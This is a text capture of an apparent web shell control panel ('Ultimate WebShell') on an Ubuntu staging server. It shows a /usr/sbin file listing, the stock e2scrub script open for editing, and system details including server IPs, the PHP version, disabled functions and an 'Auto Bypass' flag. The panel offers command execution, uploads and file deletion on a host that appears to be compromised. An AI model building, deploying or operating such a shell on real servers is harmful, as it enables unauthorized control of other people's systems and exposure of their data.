WebShell Manager
Linux Stag-Enterprise-Staging-20-04 5.11.0-1019-aws #20~20.04.1-Ubuntu SMP Tue Sep 21 10:40:39 UTC 2021 x86_64
Apache
Server: 172.31.9.152
Your IP: 216.73.216.236
System Info
HOME
snap
core20
2866
usr
sbin
Command Execution
Execute
File Upload
Upload
New Folder
New File
Name
Type
Size
Permissions
Modified
Actions
..
Parent
-
drwxr-xr-x
2026-04-10 12:14:14
-
aa-remove-unknown
File
3 KB
0755
2024-03-06 18:40:00
aa-status
File
8.63 KB
0755
2024-03-06 18:40:00
aa-teardown
File
139 B
0755
2019-06-17 23:55:38
add-shell
File
860 B
0755
2019-12-07 02:13:44
addgroup
File
36.9 KB
0755
2020-04-16 14:12:53
adduser
File
36.9 KB
0755
2020-04-16 14:12:53
agetty
File
67.38 KB
0755
2026-03-06 16:20:35
apparmor_parser
File
1.46 MB
0755
2024-03-06 18:40:00
apparmor_status
File
8.63 KB
0755
2024-03-06 18:40:00
arpd
File
78.27 KB
0755
2020-02-13 17:21:59
arptables
File
215.32 KB
0755
2023-05-09 18:39:57
arptables-nft
File
215.32 KB
0755
2023-05-09 18:39:57
arptables-nft-restore
File
215.32 KB
0755
2023-05-09 18:39:57
arptables-nft-save
File
215.32 KB
0755
2023-05-09 18:39:57
arptables-restore
File
215.32 KB
0755
2023-05-09 18:39:57
arptables-save
File
215.32 KB
0755
2023-05-09 18:39:57
badblocks
File
34.32 KB
0755
2023-10-09 01:56:01
blkdeactivate
File
14.49 KB
0755
2020-02-13 21:21:51
blkdiscard
File
34.23 KB
0755
2026-03-06 16:20:35
blkid
File
118.26 KB
0755
2026-03-06 16:20:35
blkzone
File
70.23 KB
0755
2026-03-06 16:20:35
blockdev
File
66.23 KB
0755
2026-03-06 16:20:35
bridge
File
102.3 KB
0755
2020-02-13 17:21:59
capsh
File
30.3 KB
0755
2025-02-20 16:01:08
cfdisk
File
102.59 KB
0755
2026-03-06 16:20:35
chcpu
File
46.23 KB
0755
2026-03-06 16:20:35
chgpasswd
File
66.2 KB
0755
2024-02-06 12:49:54
chmem
File
62.23 KB
0755
2026-03-06 16:20:35
chpasswd
File
58.2 KB
0755
2024-02-06 12:49:54
chroot
File
42.34 KB
0755
2019-09-05 10:38:40
cpgr
File
60.34 KB
0755
2024-02-06 12:49:54
cppw
File
60.34 KB
0755
2024-02-06 12:49:54
cryptdisks_start
File
1.51 KB
0755
2020-02-04 13:11:12
cryptdisks_stop
File
844 B
0755
2020-02-04 13:11:12
cryptsetup
File
135.54 KB
0755
2025-01-29 18:37:57
cryptsetup-reencrypt
File
105.32 KB
0755
2025-01-29 18:37:57
ctrlaltdel
File
38.23 KB
0755
2026-03-06 16:20:35
debugfs
File
225.8 KB
0755
2023-10-09 01:56:01
delgroup
File
16.11 KB
0755
2020-04-16 14:12:53
deluser
File
16.11 KB
0755
2020-04-16 14:12:53
depmod
File
170.34 KB
0755
2020-03-12 13:15:28
devlink
File
150.47 KB
0755
2020-02-13 17:21:59
dhclient
File
508.98 KB
0755
2023-01-31 22:10:35
dhclient-script
File
15.92 KB
0755
2023-01-31 22:10:35
dmsetup
File
171.02 KB
0755
2020-02-13 21:21:51
dmstats
File
171.02 KB
0755
2020-02-13 21:21:51
dosfsck
File
58.08 KB
0755
2018-05-12 22:59:39
dosfslabel
File
54.08 KB
0755
2018-05-12 22:59:39
dumpe2fs
File
30.38 KB
0755
2023-10-09 01:56:01
e2freefrag
File
18.38 KB
0755
2023-10-09 01:56:01
e2fsck
File
327.21 KB
0755
2023-10-09 01:56:01
e2image
File
42.38 KB
0755
2023-10-09 01:56:01
e2label
File
106.55 KB
0755
2023-10-09 01:56:01
e2mmpstatus
File
30.38 KB
0755
2023-10-09 01:56:01
e2scrub
File
7.13 KB
0755
2023-10-09 01:56:01
e2scrub_all
File
5.27 KB
0755
2023-10-09 01:56:01
e2undo
File
22.38 KB
0755
2023-10-09 01:56:01
e4crypt
File
30.38 KB
0755
2023-10-09 01:56:01
e4defrag
File
34.3 KB
0755
2023-10-09 01:56:01
ebtables
File
215.32 KB
0755
2023-05-09 18:39:57
ebtables-nft
File
215.32 KB
0755
2023-05-09 18:39:57
ebtables-nft-restore
File
215.32 KB
0755
2023-05-09 18:39:57
ebtables-nft-save
File
215.32 KB
0755
2023-05-09 18:39:57
ebtables-restore
File
215.32 KB
0755
2023-05-09 18:39:57
ebtables-save
File
215.32 KB
0755
2023-05-09 18:39:57
faillock
File
14.15 KB
0755
2024-01-10 13:55:08
fatlabel
File
54.08 KB
0755
2018-05-12 22:59:39
fdformat
File
34.23 KB
0755
2026-03-06 16:20:35
fdisk
File
150.27 KB
0755
2026-03-06 16:20:35
filefrag
File
18.33 KB
0755
2023-10-09 01:56:01
findfs
File
14.23 KB
0755
2026-03-06 16:20:35
fsck
File
54.27 KB
0755
2026-03-06 16:20:35
fsck.cramfs
File
38.26 KB
0755
2026-03-06 16:20:35
fsck.ext2
File
327.21 KB
0755
2023-10-09 01:56:01
fsck.ext3
File
327.21 KB
0755
2023-10-09 01:56:01
fsck.ext4
File
327.21 KB
0755
2023-10-09 01:56:01
fsck.fat
File
58.08 KB
0755
2018-05-12 22:59:39
fsck.minix
File
122.25 KB
0755
2026-03-06 16:20:35
fsck.msdos
File
58.08 KB
0755
2018-05-12 22:59:39
fsck.vfat
File
58.08 KB
0755
2018-05-12 22:59:39
fsfreeze
File
14.23 KB
0755
2026-03-06 16:20:35
fstab-decode
File
14.3 KB
0755
2020-02-13 18:38:21
fstrim
File
70.23 KB
0755
2026-03-06 16:20:35
genl
File
82.29 KB
0755
2020-02-13 17:21:59
getcap
File
14.3 KB
0755
2025-02-20 16:01:08
getpcaps
File
14.3 KB
0755
2025-02-20 16:01:08
getty
File
67.38 KB
0755
2026-03-06 16:20:35
groupadd
File
90.95 KB
0755
2024-02-06 12:49:54
groupdel
File
86.77 KB
0755
2024-02-06 12:49:54
groupmems
File
62.24 KB
0755
2024-02-06 12:49:54
groupmod
File
94.86 KB
0755
2024-02-06 12:49:54
grpck
File
62.18 KB
0755
2024-02-06 12:49:54
grpconv
File
58.05 KB
0755
2024-02-06 12:49:54
grpunconv
File
58.05 KB
0755
2024-02-06 12:49:54
halt
File
973.23 KB
0755
2023-03-02 12:58:02
hwclock
File
102.35 KB
0755
2026-03-06 16:20:35
iconvconfig
File
30.4 KB
0755
2026-01-30 08:05:14
init
File
1.55 MB
0755
2023-03-02 12:58:02
insmod
File
170.34 KB
0755
2020-03-12 13:15:28
installkernel
File
2.58 KB
0755
2019-12-07 02:13:44
integritysetup
File
60.23 KB
0755
2025-01-29 18:37:57
invoke-rc.d
File
16.64 KB
0755
2019-06-21 18:56:55
ip
File
597.62 KB
0755
2020-02-13 17:21:59
ip6tables
File
96.97 KB
0755
2023-05-09 18:39:57
ip6tables-apply
File
6.89 KB
0755
2023-05-09 18:39:57
ip6tables-legacy
File
96.97 KB
0755
2023-05-09 18:39:57
ip6tables-legacy-restore
File
96.97 KB
0755
2023-05-09 18:39:57
ip6tables-legacy-save
File
96.97 KB
0755
2023-05-09 18:39:57
ip6tables-nft
File
215.32 KB
0755
2023-05-09 18:39:57
ip6tables-nft-restore
File
215.32 KB
0755
2023-05-09 18:39:57
ip6tables-nft-save
File
215.32 KB
0755
2023-05-09 18:39:57
ip6tables-restore
File
96.97 KB
0755
2023-05-09 18:39:57
ip6tables-restore-translate
File
215.32 KB
0755
2023-05-09 18:39:57
ip6tables-save
File
96.97 KB
0755
2023-05-09 18:39:57
ip6tables-translate
File
215.32 KB
0755
2023-05-09 18:39:57
iptables
File
96.97 KB
0755
2023-05-09 18:39:57
iptables-apply
File
6.89 KB
0755
2023-05-09 18:39:57
iptables-legacy
File
96.97 KB
0755
2023-05-09 18:39:57
iptables-legacy-restore
File
96.97 KB
0755
2023-05-09 18:39:57
iptables-legacy-save
File
96.97 KB
0755
2023-05-09 18:39:57
iptables-nft
File
215.32 KB
0755
2023-05-09 18:39:57
iptables-nft-restore
File
215.32 KB
0755
2023-05-09 18:39:57
iptables-nft-save
File
215.32 KB
0755
2023-05-09 18:39:57
iptables-restore
File
96.97 KB
0755
2023-05-09 18:39:57
iptables-restore-translate
File
215.32 KB
0755
2023-05-09 18:39:57
iptables-save
File
96.97 KB
0755
2023-05-09 18:39:57
iptables-translate
File
215.32 KB
0755
2023-05-09 18:39:57
isosize
File
30.23 KB
0755
2026-03-06 16:20:35
killall5
File
26.38 KB
0755
2020-02-13 18:38:21
ldattach
File
34.23 KB
0755
2026-03-06 16:20:35
ldconfig
File
387 B
0755
2026-01-30 08:05:14
ldconfig.real
File
1 MB
0755
2026-01-30 08:05:14
logsave
File
14.16 KB
0755
2023-10-09 01:56:01
losetup
File
110.34 KB
0755
2026-03-06 16:20:35
lsmod
File
170.34 KB
0755
2020-03-12 13:15:28
luksformat
File
3.32 KB
0755
2020-02-04 13:11:12
mkdosfs
File
34.5 KB
0755
2018-05-12 22:59:39
mke2fs
File
134.62 KB
0755
2023-10-09 01:56:01
mkfs
File
14.23 KB
0755
2026-03-06 16:20:35
mkfs.bfs
File
34.23 KB
0755
2026-03-06 16:20:35
mkfs.cramfs
File
42.16 KB
0755
2026-03-06 16:20:35
mkfs.ext2
File
134.62 KB
0755
2023-10-09 01:56:01
mkfs.ext3
File
134.62 KB
0755
2023-10-09 01:56:01
mkfs.ext4
File
134.62 KB
0755
2023-10-09 01:56:01
mkfs.fat
File
34.5 KB
0755
2018-05-12 22:59:39
mkfs.minix
File
106.23 KB
0755
2026-03-06 16:20:35
mkfs.msdos
File
34.5 KB
0755
2018-05-12 22:59:39
mkfs.vfat
File
34.5 KB
0755
2018-05-12 22:59:39
mkhomedir_helper
File
22.17 KB
0755
2024-01-10 13:55:08
mklost+found
File
14.3 KB
0755
2023-10-09 01:56:01
mkswap
File
106.23 KB
0755
2026-03-06 16:20:35
modinfo
File
170.34 KB
0755
2020-03-12 13:15:28
modprobe
File
170.34 KB
0755
2020-03-12 13:15:28
netplan
File
798 B
0755
2024-06-28 16:59:34
newusers
File
98.8 KB
0755
2024-02-06 12:49:54
nfnl_osf
File
18.3 KB
0755
2023-05-09 18:39:57
nologin
File
14.3 KB
0755
2024-02-06 12:49:54
pam-auth-update
File
19.86 KB
0755
2021-09-17 06:05:34
pam_extrausers_chkpwd
File
42.16 KB
2755
2024-01-10 13:55:08
pam_extrausers_update
File
42.16 KB
0755
2024-01-10 13:55:08
pam_getenv
File
2.82 KB
0755
2020-08-12 00:15:04
pam_tally
File
14.16 KB
0755
2024-01-10 13:55:08
pam_tally2
File
18.16 KB
0755
2024-01-10 13:55:08
pam_timestamp_check
File
14.15 KB
0755
2024-01-10 13:55:08
pivot_root
File
14.23 KB
0755
2026-03-06 16:20:35
poweroff
File
973.23 KB
0755
2023-03-02 12:58:02
pwck
File
58.17 KB
0755
2024-02-06 12:49:54
pwconv
File
54.05 KB
0755
2024-02-06 12:49:54
pwunconv
File
54.05 KB
0755
2024-02-06 12:49:54
raw
File
14.23 KB
0755
2026-03-06 16:20:35
readprofile
File
22.26 KB
0755
2026-03-06 16:20:35
reboot
File
973.23 KB
0755
2023-03-02 12:58:02
remove-shell
File
904 B
0755
2019-12-07 02:13:44
resize2fs
File
66.38 KB
0755
2023-10-09 01:56:01
rfkill
File
50.23 KB
0755
2026-03-06 16:20:35
rmmod
File
170.34 KB
0755
2020-03-12 13:15:28
rmt
File
58.55 KB
0755
2023-12-05 05:16:50
rmt-tar
File
58.55 KB
0755
2023-12-05 05:16:50
rtacct
File
48.29 KB
0755
2020-02-13 17:21:59
rtcwake
File
46.23 KB
0755
2026-03-06 16:20:35
rtmon
File
78.24 KB
0755
2020-02-13 17:21:59
runlevel
File
973.23 KB
0755
2023-03-02 12:58:02
runuser
File
66.23 KB
0755
2026-03-06 16:20:35
service
File
9.04 KB
0755
2019-06-21 18:56:55
setcap
File
14.3 KB
0755
2025-02-20 16:01:08
sfdisk
File
138.23 KB
0755
2026-03-06 16:20:35
shadowconfig
File
885 B
0755
2021-07-14 22:08:18
shutdown
File
973.23 KB
0755
2023-03-02 12:58:02
sshd
File
863.79 KB
0755
2026-03-05 19:37:37
start-stop-daemon
File
47.32 KB
0755
2022-05-25 11:14:20
sulogin
File
50.23 KB
0755
2026-03-06 16:20:35
swaplabel
File
18.23 KB
0755
2026-03-06 16:20:35
swapoff
File
22.23 KB
0755
2026-03-06 16:20:35
swapon
File
50.23 KB
0755
2026-03-06 16:20:35
switch_root
File
14.23 KB
0755
2026-03-06 16:20:35
sysctl
File
30.23 KB
0755
2023-10-31 11:35:56
tarcat
File
936 B
0755
2023-12-05 05:16:50
tc
File
529.45 KB
0755
2020-02-13 17:21:59
telinit
File
973.23 KB
0755
2023-03-02 12:58:02
tipc
File
126.23 KB
0755
2020-02-13 17:21:59
tune2fs
File
106.55 KB
0755
2023-10-09 01:56:01
tzconfig
File
106 B
0755
2025-04-22 10:15:47
unix_chkpwd
File
42.15 KB
2755
2024-01-10 13:55:08
unix_update
File
42.15 KB
0755
2024-01-10 13:55:08
update-ca-certificates
File
5.29 KB
0755
2024-09-24 17:46:09
update-mime
File
9.18 KB
0755
2019-10-18 23:05:50
update-passwd
File
34.56 KB
0755
2019-12-16 23:51:51
update-rc.d
File
16.76 KB
0755
2019-06-21 18:56:55
useradd
File
143.71 KB
0755
2024-02-06 12:49:54
userdel
File
98.89 KB
0755
2024-02-06 12:49:54
usermod
File
139.49 KB
0755
2024-02-06 12:49:54
veritysetup
File
51.82 KB
0755
2025-01-29 18:37:57
vigr
File
68.55 KB
0755
2024-02-06 12:49:54
vipw
File
68.55 KB
0755
2024-02-06 12:49:54
visudo
File
218.2 KB
0755
2025-06-25 20:10:55
wipefs
File
46.23 KB
0755
2026-03-06 16:20:35
wpa_action
File
1.69 KB
0755
2019-08-13 23:12:36
wpa_cli
File
152.22 KB
0755
2025-02-24 20:14:55
wpa_supplicant
File
2.77 MB
0755
2025-02-24 20:14:55
xtables-legacy-multi
File
96.97 KB
0755
2023-05-09 18:39:57
xtables-monitor
File
215.32 KB
0755
2023-05-09 18:39:57
xtables-nft-multi
File
215.32 KB
0755
2023-05-09 18:39:57
zic
File
62.29 KB
0755
2026-01-30 08:05:14
zramctl
File
114.34 KB
0755
2026-03-06 16:20:35
0
items selected
Choose Action...
Delete Selected
Zip Selected
Unzip Selected
Execute Action
Clear Selection
© Ultimate WebShell | Auto Bypass Enabled
Create New Folder
Create New File
Edit File: e2scrub
#!/bin/bash # Copyright (C) 2018 Oracle. All Rights Reserved. # # Author: Darrick J. Wong <darrick.wong@oracle.com> # # This program is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License # as published by the Free Software Foundation; either version 2 # of the License, or (at your option) any later version. # # This program is distributed in the hope that it would be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write the Free Software Foundation, # Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301, USA. # Automatically check an LVM-managed filesystem online. # We use lvm snapshots to do this, which means that we can only # check filesystems in VGs that have at least 256MB (or so) of # free space. PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin if (( $EUID != 0 )); then echo "e2scrub must be run as root" exit 1 fi snap_size_mb=256 fstrim=0 reap=0 e2fsck_opts="" conffile="/etc/e2scrub.conf" test -f "${conffile}" && . "${conffile}" print_help() { echo "Usage: $0 [OPTIONS] mountpoint | device" echo echo "mountpoint must be on an LVM-managed block device" echo "-n: Show what commands e2scrub would execute." echo "-r: Remove e2scrub snapshot and exit, do not check anything." echo "-t: Run fstrim if successful." echo "-V: Print version information and exit." } print_version() { echo "e2scrub 1.45.5 (07-Jan-2020)" } exitcode() { ret="$1" # If we're being run as a service, the return code must fit the LSB # init script action error guidelines, which is to say that we # compress all errors to 1 ("generic or unspecified error", LSB 5.0 # section 22.2) and hope the admin will scan the log for what # actually happened. # We have to sleep 2 seconds here because journald uses the pid to # connect our log messages to the systemd service. This is critical # for capturing all the log messages if the scrub fails, because the # fail service uses the service name to gather log messages for the # error report. if [ -n "${SERVICE_MODE}" -a "${ret}" -ne 0 ]; then test "${ret}" -ne 0 && ret=1 sleep 2 fi exit "${ret}" } while getopts "nrtV" opt; do case "${opt}" in "n") DBG="echo Would execute: " ;; "r") reap=1;; "t") fstrim=1;; "V") print_version; exitcode 0;; *) print_help; exitcode 2;; esac done shift "$((OPTIND - 1))" arg="$1" if [ -z "${arg}" ]; then print_help exitcode 1 fi if ! type lsblk >& /dev/null ; then echo "e2scrub: can't find lsblk --- is util-linux installed?" exitcode 1 fi if ! type lvcreate >& /dev/null ; then echo "e2scrub: can't find lvcreate --- is lvm2 installed?" exitcode 1 fi # close file descriptor 3 (from cron) since it causes lvm to kvetch exec 3<&- # Find the device for a given mountpoint dev_from_mount() { local mountpt="$(realpath "$1")" lsblk -o NAME,FSTYPE,MOUNTPOINT -p -P -n 2> /dev/null | while read vars; do eval "${vars}" if [ "${mountpt}" != "${MOUNTPOINT}" ]; then continue fi case "${FSTYPE}" in ext[234]) echo "${NAME}" return 0 ;; esac done return 1 } # Check a device argument dev_from_arg() { local dev="$1" local fstype="$(lsblk -o FSTYPE -n "${dev}" 2> /dev/null)" case "${fstype}" in ext[234]) echo "${dev}" return 0 ;; esac return 1 } mnt_from_dev() { local dev="$1" if [ -n "${dev}" ]; then lsblk -o MOUNTPOINT -n "${dev}" fi } # Construct block device path and mountpoint from argument if [ -b "${arg}" ]; then dev="$(dev_from_arg "${arg}")" mnt="$(mnt_from_dev "${dev}")" else dev="$(dev_from_mount "${arg}")" mnt="${arg}" fi if [ ! -e "${dev}" ]; then echo "${arg}: Not an ext[234] filesystem." print_help exitcode 16 fi # Make sure this is an LVM device we can snapshot lvm_vars="$(lvs --nameprefixes -o name,vgname,lv_role --noheadings "${dev}" 2> /dev/null)" eval "${lvm_vars}" if [ -z "${LVM2_VG_NAME}" ] || [ -z "${LVM2_LV_NAME}" ] || echo "${LVM2_LV_ROLE}" | grep -q "snapshot"; then echo "${arg}: Not connnected to an LVM logical volume." print_help exitcode 16 fi start_time="$(date +'%Y%m%d%H%M%S')" snap="${LVM2_LV_NAME}.e2scrub" snap_dev="/dev/${LVM2_VG_NAME}/${snap}" teardown() { # Remove and wait for removal to succeed. ${DBG} lvremove -f "${LVM2_VG_NAME}/${snap}" while [ -e "${snap_dev}" ] && [ "$?" -eq "5" ]; do sleep 0.5 ${DBG} lvremove -f "${LVM2_VG_NAME}/${snap}" done } check() { # First we recover the journal, then we see if e2fsck tries any # non-optimization repairs. If either of these two returns a # non-zero status (errors fixed or remaining) then this fs is bad. E2FSCK_FIXES_ONLY=1 export E2FSCK_FIXES_ONLY ${DBG} "/sbin/e2fsck" -E journal_only -p ${e2fsck_opts} "${snap_dev}" || return $? ${DBG} "/sbin/e2fsck" -f -y ${e2fsck_opts} "${snap_dev}" } mark_clean() { ${DBG} "/sbin/tune2fs" -C 0 -T "${start_time}" "${dev}" } mark_corrupt() { ${DBG} "/sbin/tune2fs" -E force_fsck "${dev}" } setup() { # Try to remove snapshot for 30s, bail out if we can't remove it. lvremove_deadline="$(( $(date "+%s") + 30))" ${DBG} lvremove -f "${LVM2_VG_NAME}/${snap}" 2>/dev/null while [ -e "${snap_dev}" ] && [ "$?" -eq "5" ] && [ "$(date "+%s")" -lt "${lvremove_deadline}" ]; do sleep 0.5 ${DBG} lvremove -f "${LVM2_VG_NAME}/${snap}" done if [ -e "${snap_dev}" ]; then echo "${arg}: e2scrub snapshot is in use, cannot check!" return 1 fi # Create the snapshot, wait for device to appear. ${DBG} lvcreate -s -L "${snap_size_mb}m" -n "${snap}" "${LVM2_VG_NAME}/${LVM2_LV_NAME}" if [ $? -ne 0 ]; then echo "${arg}: e2scrub snapshot FAILED, will not check!" return 1 fi ${DBG} udevadm settle 2> /dev/null return 0 } if [ "${reap}" -gt 0 ]; then if [ -e "${snap_dev}" ]; then teardown 2> /dev/null fi exit 0 fi if ! setup; then exitcode 8 fi trap "teardown; exit 1" EXIT INT QUIT TERM # Check and react check case "$?" in "0") # Clean check! echo "${arg}: Scrub succeeded." mark_clean teardown trap '' EXIT # Trim the free space, which requires the snapshot be deleted. if [ "${fstrim}" -eq 1 ] && [ -d "${mnt}" ] && type fstrim > /dev/null 2>&1; then echo "${arg}: Trimming free space." fstrim -v "${mnt}" fi ret=0 ;; "8") # Operational error, what now? echo "${arg}: e2fsck operational error." teardown trap '' EXIT ret=8 ;; *) # fsck failed. Check if the snapshot is invalid; if so, make a # note of that at the end of the log. This isn't necessarily a # failure because the mounted fs could have overflowed the # snapshot with regular disk writes /or/ our repair process # could have done it by repairing too much. # # If it's really corrupt we ought to fsck at next boot. is_invalid="$(lvs -o lv_snapshot_invalid --noheadings "${snap_dev}" | awk '{print $1}')" if [ -n "${is_invalid}" ]; then echo "${arg}: Scrub FAILED due to invalid snapshot." ret=8 else echo "${arg}: Scrub FAILED due to corruption! Unmount and run e2fsck -y." mark_corrupt ret=6 fi teardown trap '' EXIT ;; esac exitcode "${ret}"
Rename
Change Permissions
Common permissions: 755 (rwxr-xr-x), 644 (rw-r--r--), 777 (rwxrwxrwx)
System Information
Uname: Linux Stag-Enterprise-Staging-20-04 5.11.0-1019-aws #20~20.04.1-Ubuntu SMP Tue Sep 21 10:40:39 UTC 2021 x86_64 Software: Apache PHP Version: 7.4.3-4ubuntu2.29 Protocol: HTTP/1.1 Server IP: 172.31.9.152 Your IP: 216.73.216.236 Mail: ON Curl: ON Owner: www-data MySQL: ON Disabled Functions: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare, Auto Bypass: ENABLED